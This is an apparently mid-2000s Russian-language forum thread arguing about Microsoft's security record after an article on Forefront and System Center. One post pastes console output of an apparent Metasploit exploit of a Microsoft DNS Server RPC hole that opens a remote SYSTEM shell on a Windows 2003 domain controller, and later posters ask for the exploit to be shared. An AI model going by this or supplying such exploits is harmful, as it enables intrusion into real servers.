Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Презентация в России Microsoft Forefront и Microsoft System Center
 
Обсуждение статьи Презентация в России Microsoft Forefront и Microsoft System Center
 
Я так понял, это объединение SMS2003 и MOM2005. Вместо этого есть Nagios.
 
Цитата
Zert, 17.04.2007 09:12:10
Цитата
Ну не смотрятся рядом слова "Microsoft" и "безопасность", не смотрятся!
Ну почему же, возьмём например MSSQL 2005-за полтора года ни одной уязвимости.
 
Если бы ещё MSSQL юзали так же, как и мускуль. А то я ни одной инсталляции MSSQL ещё не видел.
 
Боян, но: покупая лицензионный Windows - ТЫ финансируешь войну в Ираке =)
 
SMS2003 и MOM2005 - это совсем не тоже, что Nagios. Очень удивляют такие вопросы - похоже на "детский сад".

"Microsoft" и "безопасность", не смотрятся! - Так говорят люди, которые далеки от вопросов "безопасности"
 
Цитата
Java пишет:
SMS2003 и MOM2005 - это совсем не тоже, что Nagios. Очень удивляют такие вопросы - похоже на "детский сад".
Естественно не одно и тоже - названия разные и коробочки у SMS2003 и MOM2005 красивее.

Цитата
Java пишет:
"Microsoft" и "безопасность", не смотрятся! - Так говорят люди, которые далеки от вопросов "безопасности"
Так говорят лишь люди, которым маркетолухи промыли мозги и которые ничего кроме винды в своей жизни не видели. Какая может быть безопасность у системы с закрытым кодом, которая обновляется один раз в месяц, с вечно дырявым IE, система, которую взламывают на уровне ядра анимированные курсоры, на которую регулярно выходят 0day remote root-эксплоиты вроде недавнего "Microsoft DNS Server Remote Code execution Exploit" и которая уже всех в Интернет достала спамом с виндовых ботнетов.
 
Цитата
Java пишет:
"Microsoft" и "безопасность", не смотрятся! - Так говорят люди, которые далеки от вопросов "безопасности"

В безопасность от Microsoft верят лишь наивные юзеры, зазомбированные мелкомягкими баннерами. Реальная, а не маркетинговая, "безопасность" от Microsoft выглядит вот так:

[*] Connecting to the endpoint mapper service...
[*] Started bind handler
[*] Discovered Microsoft DNS Server RPC service on port 1045
[*] Connecting to the endpoint mapper service...
[*] Detected a Windows 2003 SP1-SP2 target...
[*] Trying target Windows 2003 Server SP1-SP2 English...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_ip_tcp:172.21.42.12[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_ip_tcp:172.21.42.12[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (172.21.45.86:44563 -> 172.21.42.12:4444)

Microsoft Windows [Version 5.2.3790]
© Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>systeminfo

Host Name:                 ADC02
OS Name:                   Microsoft® Windows® Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Uniprocessor Free

Вот что из себя представляет их флагманская серверная платформа, удаленно раздающая кому попало привилегии SYSTEM на контроллере AD и хеши от учетных записей домена в качестве бонуса, с абсолютно дырявой защитой от переполнений DEP, которую "улучшили" в SP1 сразу после того, как Win2003 вломали через уязвимость DCOM обойдя эту защиту.  Очередной 0day, патча нет и когда будет неизвестно.
"Безопасность" от майкросфт выражается десятками remote root дыр в стандартных службах, IE и остальных приложениях, которые в лучшем случае будут устранены через месяц каким-нибудь кривым фиксом, который будет чиниться заплаткой на заплатку.
Так было десять лет назад, когда черви CodeRed и Nimda ломали дырявые MSSQL и IIS и DDoSили Белый Дом, так было пять лет назад когда бОльшая часть виндовых машин, торчащих в инет, были хакнуты червями Lovesan через дыру в DCOM, а потом Sasser-ом через дыру в lsass, и эти машины до сих пор продолжают работать на спамеров и хакеров - так и сейчас все осталось на своих местах: все те же remote root дыры в службах от эксплуатации которых ни разу не спасает крутой DEP, приправленные рекламной брехней про безопасность, непревзойденную надежность и управляемость.

P.S.
Тому странному типу, который срочно продает Linux сервер на объявлении справа: "Мужик, продавать Linux бесполезно, т.к. его можно скачать бесплатно  :)  Оставь лучше Linux с bind вместо винды с дырявым DNS либо в качестве брандмауэра защищать винду, как сделали сами M$, которые спрятали свои сервера за акамаевскими Linux серверами." :)
 
Кинь эксплоит поиграться ;)
 
Люди дайте сплойт пожалуйста ну очень уж хочется ломануть свой сайт дыры есть!
Страницы: 1
Читают тему